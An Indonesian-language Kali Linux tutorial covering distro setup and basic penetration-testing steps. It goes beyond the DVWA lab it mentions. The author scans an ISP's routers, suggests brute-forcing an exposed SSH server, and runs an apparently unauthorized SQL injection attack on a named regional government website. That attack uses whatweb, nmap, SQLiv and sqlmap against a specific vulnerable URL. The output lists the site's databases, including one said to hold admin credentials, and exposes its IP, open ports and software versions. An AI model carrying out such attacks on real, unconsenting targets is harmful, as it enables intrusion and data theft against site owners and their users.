Kali Linux Tutorial

Kali Linux Tutorial



Jika Anda seorang ahli atau setidaknya akrab dengan Linux, perintah dan lingkungan, baru saja menginstal Kali Linux di mesin Anda, ingin menjadi Master Kali Linux atau Peretas Etis maka Anda berada di tempat yang tepat. Pada artikel ini, saya akan membahas tutorial Kali Linux untuk pengguna Linux yang belum terbiasa dengan Kali dan membantu Anda memulai beberapa teknik dasar yang digunakan untuk peretasan dan pengujian keamanan saat menggunakan Kali.

Apa itu KaliLinux?

KaliLinux, ( pertama kali dirilis pada 13 Maret 2013 ) yang secara resmi dikenal sebagai BackTrack, dikembangkan oleh perusahaan keamanan Offensive Security, adalah distribusi yang berfokus pada forensik dan keamanan berdasarkan cabang Pengujian Debian. Kali Linux dirancang dengan mempertimbangkan pengujian penetrasi, pemulihan data, dan deteksi ancaman. Proyek ini beralih ke model rilis bergulir awal tahun ini dalam upaya untuk menyediakan lebih banyak utilitas keamanan terkini kepada pengguna distribusi. Kali Linux gratis, dan akan selalu begitu. Ini memiliki 600+ alat pengujian penetrasi yang disertakan.







Mengapa KaliLinux? Apakah itu tepat untuk Anda?

Kali Linux telah mendapatkan banyak popularitas baru-baru ini. Dan ada alasan di balik itu. Peretasan kembali sebagai hal keren yang harus dilakukan dalam budaya populer dan ini dapat dikaitkan secara signifikan dengan serial TV Mr. Robot. Popularitas Mr. Robot membantu Kali Linux dalam mendapatkan pengguna baru. Orang-orang yang hampir tidak memiliki pengetahuan tentang Linux atau apa pun yang terkait dengan keamanan komputer sekarang mencoba menggunakan Kali sebagai distribusi Linux utama mereka.



Distribusi Pengujian Penetrasi Tercanggih Kami. – Pengembang Kali Linux. (Itu tertulis di halaman utama Kali.org di bagian paling atas halaman.) Apa yang Anda dapatkan dari pernyataan itu? Apakah Anda memperhatikan ini: APTD (Distribusi Pengujian Penetrasi Lanjutan)? Tidak ada istilah hacking di sini secara harfiah. Kali Linux sama dengan distro Linux lainnya. Sederhananya, ini adalah distribusi Linux yang dikemas dengan alat terkait keamanan dan ditargetkan untuk pakar keamanan jaringan dan komputer. Namun, penggunaan Kali Linux hanya berfokus pada keamanan dan forensik.



Distribusi Linux tidak lebih dari sebuah bundel yang berisi kernel Linux, satu set utilitas inti dan aplikasi dan beberapa pengaturan default. Jadi, Kali Linux tidak menawarkan sesuatu yang unik dalam artian sebagian besar alat yang disediakan dapat diinstal pada distribusi Linux apa pun.





Kali Linux secara khusus diarahkan untuk memenuhi persyaratan pengujian penetrasi profesional dan audit keamanan. Ini ditujukan untuk subset tertentu dari pengguna Linux. Pentester, peretas, dll. Ini bukan distribusi yang disarankan jika Anda mengharapkan Kali untuk desktop Linux tujuan umum untuk pengembangan, desain web, permainan, kantor, dll. Kali mungkin memberi Anda beberapa tantangan, bahkan jika Anda adalah pengguna Linux yang berpengalaman .

HAL YANG HARUS DILAKUKAN SETELAH MENGINSTAL KALI LINUX

Setelah menginstal Kali Linux, Anda mungkin bertanya-tanya apa yang harus dilakukan selanjutnya dengan ini, bukan?. Semua orang menghadapi masalah ini, jangan khawatir.



LANGKAH 1: SET UP REPOSITORY

Pertama, Anda mungkin sudah mengetahuinya, tetapi sangat penting untuk mengatur repositori dengan benar. Seperti yang saya katakan, model rilis bergulir Kali Linux dalam upaya untuk menyediakan lebih banyak utilitas keamanan terkini kepada pengguna distribusi. Umumnya, jika Anda memiliki Kali Linux yang baru diinstal, repositori merujuk ke media yang Anda gunakan untuk menginstal. Untuk memperbaikinya, Anda perlu mengubah repositori ke repositori resmi Kali Linux. File yang diperlukan terletak di bawah /etc/apt/sources.list . Buka file dengan editor teks leafpad dan ganti repositori default ke repositori Kali Rolling resmi ini:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

LANGKAH 2: PERBARUI DAN TINGKATKAN KALI LINUX ANDA

Setelah itu perbarui dan tingkatkan sistem Anda, sinkronkan Kali Linux Anda ke versi terbaru. Untuk melakukan itu buka terminal, dan ketik:

apt update -y && apt upgrade -y && apt dist-upgrade 

Perintah apt update mengunduh dan mengambil informasi daftar paket dari repositori dan memperbaruinya untuk mendapatkan informasi tentang versi terbaru dari paket dan dependensinya.

Perintah apt upgrade mengunduh dan menginstal versi yang lebih baru dari paket paket Kali Linux yang diinstal selama tidak memiliki kesalahan pada dependensi.

Dist-upgrade apt akan memperbarui semua paket ke versi terbaru yang tersedia, apa pun yang terjadi. Dan juga menginstal dan menghapus dependensi sesuai kebutuhan (menginstal dependensi untuk memenuhi paket, tentu saja, tetapi juga menghapus dependensi yang menjadi yatim piatu jika paket yang diperbarui tidak lagi membutuhkan dependensi.

KONSEP PENGUJIAN PENETRASI DASAR DENGAN KALI LINUX

Setelah Anda berhasil melakukan langkah-langkah tersebut, ada tiga hal utama yang dapat Anda lakukan dengan Kali Linux berdasarkan sistem yang ditargetkan termasuk:

  1. Peretasan Jaringan Nirkabel – Peretasan Wifi, Phising, Keracunan ARP, dll.
  2. Peretasan Aplikasi Web – Injeksi SQL, Pemalsuan Permintaan Lintas Situs (CSRF), Phising Web, dll.
  3. Peretasan Perangkat – Eksploitasi mesin target untuk mengendalikannya.

Saya tidak termasuk peretasan IoT, bukan berarti Kali Linux tidak memiliki kemampuan untuk tujuan itu. Tapi, secara harfiah itu bisa menjadi milik Peretasan Perangkat juga. Karena perangkat memiliki tampilan dan bentuk fisik. Dalam tutorial ini saya membahas pengetahuan dasar mereka. Karena, Kali Linux sangat besar, tidak muat dalam satu artikel!

Perlu Anda ketahui juga, Siklus atau Prosedur Pengujian Penetrasi. Mereka:

  1. Pengintaian – Pengumpulan Informasi
  2. Memindai
  3. Operasi
  4. Pasca Eksploitasi

HACKING JARINGAN NIRKABEL DENGAN KALI LINUX

Dalam hal peretasan jaringan nirkabel, korbannya mungkin berbeda. Sebab, jaringan nirkabel terdiri dari beberapa hal, seperti ISP (Internet Service Provider), router dan rekan-rekannya (modem, hub, switch, dll) dan klien (pengguna, CCTV, komputer jarak jauh, dll). Mereka juga memiliki kemungkinan yang rentan.

Internet adalah agregasi besar dan kompleks dari perangkat keras jaringan, dihubungkan bersama oleh gateway. Melacak rute yang diikuti paket Anda penting untuk mengetahui bagaimana Anda mencapai nama host atau alamat IP target tertentu.

Kali Linux memiliki alat bawaan yang disebut Traceroute. Traceroute menggunakan waktu protokol IP untuk medan hidup dan mencoba untuk mendapatkan respons ICMP TIME_EXCEEDED dari setiap gateway di sepanjang jalur ke beberapa host. Traceroute mencoba untuk melacak rute yang akan diikuti oleh paket IP ke beberapa host internet dengan meluncurkan paket probe dengan TTL kecil (waktu untuk hidup) kemudian mendengarkan balasan ICMP yang melebihi waktu dari gateway. Saya akan memberi Anda dan contoh cara melacak router ISP yang digunakan untuk menangani koneksi kami menggunakan Traceroute.

1. Pengakuan

Pengumpulan informasi adalah lompatan awal yang paling penting, jangan lewatkan langkah ini. Dalam langkah ini, tujuan kami adalah untuk mendapatkan sebanyak mungkin informasi berguna yang bisa kami dapatkan, dan kemudian informasi ini digunakan untuk langkah selanjutnya.

Pertama, buka terminal dan ketik perintah ini untuk mulai menelusuri jalan ke situs, dalam hal ini saya mengatur situs ke google.com.

traceroute google.com 

Tangkapan Layar Traceroute

2. Pemindaian

Setelah kami meluncurkan perintah, itu akan mencantumkan ke mana paket kami berjalan secara berurutan. Seperti yang Anda lihat di atas, saya mendapat 3 hop yang salah satunya adalah server ISP saya. IP pertama dalam daftar adalah router saya, yang bertindak sebagai gateway. Dan dua berikutnya milik ISP saya. Sekarang mari kita periksa layanan yang mereka jalankan menggunakan Nmap. Jadi, target yang akan kita pindai adalah 10.152.192.1 dan 10.13.223.102 . Di terminal saya menjalankan perintah berikut:

nmap -v -sS [IP Target] -Pn 

Mari kita uraikan argumen perintah:

-v = Aktifkan mode verbositas

-sS = Gunakan teknik pemindaian TCP SYN

-Pn = Perlakukan semua host sebagai online — lewati penemuan host

Dan inilah hasil yang kami dapatkan.

tangkapan layar nmap 2

Sayangnya, semua port aktif 10.152.192.1 difilter, artinya semua koneksi TCP yang masuk diblokir oleh IDS atau Firewall pada IP ini. Sekarang, mari lakukan pemindaian lagi ke target kedua.

tangkapan layar nmap 1

3. Operasi

Dalam prosedur ini, saya tidak bermaksud untuk melakukan eksploitasi yang sebenarnya, melainkan saya tunjukkan caranya. Berdasarkan hasil scan Nmap diatas kita mengetahui bahwa IP ini memiliki server SSH yang berjalan pada port 22, dan terbuka. Hal ini terbuka untuk menjadi bruteforced, haha! Kami menemukan lubangnya, server SSH ini adalah kemungkinan lubang yang bisa kami coba akses. Ada beberapa alat di Kali Linux yang mendukung serangan bruteforce atau kamus terhadap protokol SSH. Yang paling populer dan kuat adalah Hydra.

Ok, itu tadi prosedur dasar melakukan penetration test terhadap server target, yang dalam contoh kita ini adalah server ISP saya.

HACKING APLIKASI WEB DENGAN KALI LINUX

Sebenarnya, jika Anda menyukai ini, Anda dapat mengatur lingkungan peretasan Anda dengan menginstal DWVA (Damn Vulnerable Web App) ke Kali Linux Anda. Ini adalah aplikasi web PHP/MySQL yang memiliki banyak lubang yang rentan. Tujuan utamanya adalah untuk menjadi bantuan bagi profesional keamanan untuk menguji keterampilan dan alat mereka di lingkungan hukum, dan membantu pengembang web lebih memahami proses mengamankan aplikasi web. Anda bisa mendapatkan DWVA secara gratis di Github di sini: https://github.com/ethicalhack3r/DVWA.

Untuk saat ini saya akan menunjukkan kepada Anda bagaimana melakukan Peretasan Aplikasi Web di situs nyata. Tapi, janji saya itu terbatas pada tujuan pendidikan saja. Kami akan mensimulasikan serangan nyata di situs nyata menggunakan injeksi SQL.

Prasyarat

Alat yang dicakup:

– Whatweb (sudah terpasang)

– Nmap (pra-instal)

– SQLiv (instal secara manual)

– SQLMap (pra-instal)

Kami membutuhkan satu lagi alat tambahan yang tersedia di Github di sini: https://github.com/Hadesy2k/sqliv, instal terlebih dahulu ke Kali Linux kami. Alat ini bernama SQLiv yang mampu melakukan pemindaian tertarget dengan menyediakan domain tertentu (dengan perayapan). Ketik terminal:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Sasaran: www.trenggalekkab.go.id

1. Pengakuan

Kumpulkan sebanyak mungkin informasi bermanfaat yang bisa kami dapatkan. Kita bisa membuka halaman web dan mendeteksi aplikasi apa yang berjalan di situs ini. Pertama, mari kita periksa situs web apa itu. Kami akan menggunakan whatweb untuk melakukan itu.

whatweb www.trenggalekkab.go.id 

Tangkapan Layar Web Apa?

Seperti yang Anda lihat hasil di atas, target berada di Indonesia. Ini sedang berjalan Apache v2.2.27 di server webnya dan juga memiliki PHP v5.4.31 , ia memiliki alamat IP 103.247.21.142 . Oke, perhatikan itu. Anda mungkin perlu mengunjungi halaman webnya, mencari file atau halaman yang dibuat, parameter URL, atau bahkan formulir login. Untuk saat ini kita membutuhkan alamat IP tersebut untuk langkah selanjutnya yaitu scanning.

2. Pemindaian

Seperti sebelumnya, kami menggunakan Nmap lagi untuk memindai port dan layanan apa yang berjalan pada target.

nmap -v -sS 103.247.21.142 

Dan inilah hasil yang kami dapatkan:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Ada banyak port terbuka yang menangani setiap layanan pada target, tetapi yang terlihat menarik adalah layanan mysql pada port 3306. Diindikasikan bahwa situs ini menggunakan mysql untuk mengelola informasi mereka dalam database. Kemudian, saya bertanya-tanya apakah ada kerentanan SQL Injection di situs ini. Jadi, saya memindai situs lagi menggunakan SQLiv yang baru saja kami instal. Saya mengetik perintah:

sqliv -t www.trenggalekkab.go.id 

Tangkapan Layar Peretasan SQL1

Kami menemukan 2 kemungkinan URL rentan SQL di situs ini. Perhatikan URL tersebut.

3. Operasi

Oke, kami telah mendapatkan URL yang rentan terhadap SQL, dan siap untuk dieksekusi. Untuk melakukan itu kita akan menggunakan SQLMap. Sintaksnya adalah:

sqlmap [Vulnerable URL] --dbs 

Perintahnya akan terlihat seperti ini:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Argumen –dbs adalah untuk memberitahu SQLMap untuk mendapatkan database target. Berikut adalah output yang kami dapatkan:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap menemukan 2 database, tetapi hanya satu di antaranya yang berisi data sensitif, seperti akun kredensial admin. Itu di trengkab_trg. Setelah kita menemukan databasenya, masih ada langkah lain yang harus kita lakukan. Yaitu menemukan tabel dan kolom dan langkah terakhir adalah membuang data. Saya tidak akan menunjukkan caranya di bagian ini, menggunakan target ini. Setidaknya Anda tahu ide dasar tentang siklus serangan, dan menggunakan beberapa alat.

PERATURAN PERANGKAT

Dalam artikel mendatang di situs ini kami akan membahas peretasan perangkat, pantau terus. Sebagai peringatan awal, Anda ingin memastikan bahwa Anda mengetahui beberapa Python untuk ini.